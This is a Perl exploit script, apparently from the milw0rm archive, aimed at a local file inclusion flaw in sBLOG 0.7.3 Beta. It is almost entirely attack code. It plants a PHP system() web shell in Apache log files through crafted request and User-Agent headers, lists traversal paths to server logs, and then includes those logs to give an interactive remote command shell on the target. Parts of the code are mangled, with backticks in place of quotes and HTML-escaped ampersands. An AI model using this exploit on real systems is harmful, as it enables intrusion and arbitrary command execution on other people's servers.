sBLOG 0.7.3 Beta (inc/lang.php) Local File Inclusion Exploit#!/usr/bin/perl
# sBLOG 0.7.3 Beta(inc/lang.php)Local File Inclusion Exploit
# D.Script: http://sourceforge.net/projects/sblog/
# V.Code:
# if(isset($conf_lang_default) && file_exists('lang/' . $conf_lang_default . '.php'))
#	 require('lang/' . $conf_lang_default . '.php');
# Discovered & Coded by : GolD_M = [Mahmood_ali]
# Contact:HackEr_@w.Cn
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# Thanx : w4ck1ng.com & cyb3rt & 020

use IO::Socket;
use LWP::Simple;

#ripped

@apache=(
`../../../../../var/log/httpd/access_log`,
`../../../../../var/log/httpd/error_log`,
`../apache/logs/error.log`,
`../apache/logs/access.log`,
`../../apache/logs/error.log`,
`../../apache/logs/access.log`,
`../../../apache/logs/error.log`,
`../../../apache/logs/access.log`,
`../../../../apache/logs/error.log`,
`../../../../apache/logs/access.log`,
`../../../../../apache/logs/error.log`,
`../../../../../apache/logs/access.log`,
`../logs/error.log`,
`../logs/access.log`,
`../../logs/error.log`,
`../../logs/access.log`,
`../../../logs/error.log`,
`../../../logs/access.log`,
`../../../../logs/error.log`,
`../../../../logs/access.log`,
`../../../../../logs/error.log`,
`../../../../../logs/access.log`,
`../../../../../etc/httpd/logs/access_log`,
`../../../../../etc/httpd/logs/access.log`,
`../../../../../etc/httpd/logs/error_log`,
`../../../../../etc/httpd/logs/error.log`,
`../../.. /../../var/www/logs/access_log`,
`../../../../../var/www/logs/access.log`,
`../../../../../usr/local/apache/logs/access_log`,
`../../../../../usr/local/apache/logs/access.log`,
`../../../../../var/log/apache/access_log`,
`../../../../../var/log/apache/access.log`,
`../../../../../var/log/access_log`,
`../../../../../var/www/logs/error_log`,
`../../../../../var/www/logs/error.log`,
`../../../../../usr/local/apache/logs/error_log`,
`../../../../../usr/local/apache/logs/error.log`,
`../../../../../var/log/apache/error_log`,
`../../../../../var/log/apache/error.log`,
`../../../../../var/log/access_log`,
`../../../../../var/log/error_log`
);

if (@ARGV < 3) {
print `
===============================================================
# sBLOG 0.7.3 Beta(inc/lang.php)Local File Inclusion Exploit  #
#           Gold.pl [Victim] / (apachepath)                   #
#        Ex: Gold.pl [Victim] / ../logs/error.log             #
===============================================================
# Greetz To: Tryag-Team &amp; 4lKaSrGoLd3n-Team &amp; AsbMay's Group  #
#            Thanx : w4ck1ng.com &amp; cyb3rt &amp; 020               #
===============================================================
`;
exit();
}

$host=$ARGV[0];
$path=$ARGV[1];
$apachepath=$ARGV[2];

print `Code is injecting in logfiles...\n`;
$CODE=`<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>`;
$socket = IO::Socket::INET->new(Proto=>`tcp`, PeerAddr=>`$host`, PeerPort=>`80`) or die `Connection failed.\n\n`;
print $socket `GET `.$path.$CODE.` HTTP/1.1\r\n`;
print $socket `user-Agent: `.$CODE.`\r\n`;
print $socket `Host: `.$host.`\r\n`;
print $socket `Connection: close\r\n\r\n`;
close($socket);
print `Write END to exit!\n`;
print `If not working try another apache path\n\n`;

print `[shell] `;$cmd = <STDIN>;

while($cmd !~ `END`) {
$socket = IO::Socket::INET->new(Proto=>`tcp`, PeerAddr=>`$host`, PeerPort=>`80`) or die `Connection failed.\n\n`;

#now include parameter

print $socket `GET `.$path.`/inc/lang.php?conf_lang_default=`.$apache[$apachepath].`%00&amp;cmd=$cmd HTTP/1.1\r\n`;
print $socket `Host: `.$host.`\r\n`;
print $socket `Accept: */*\r\n`;
print $socket `Connection: close\r\n\r\n`;

while ($raspuns = <$socket>)
{

print $raspuns;
}

print `[shell] `;
$cmd = <STDIN>;
}

# milw0rm.com [2007-03-29]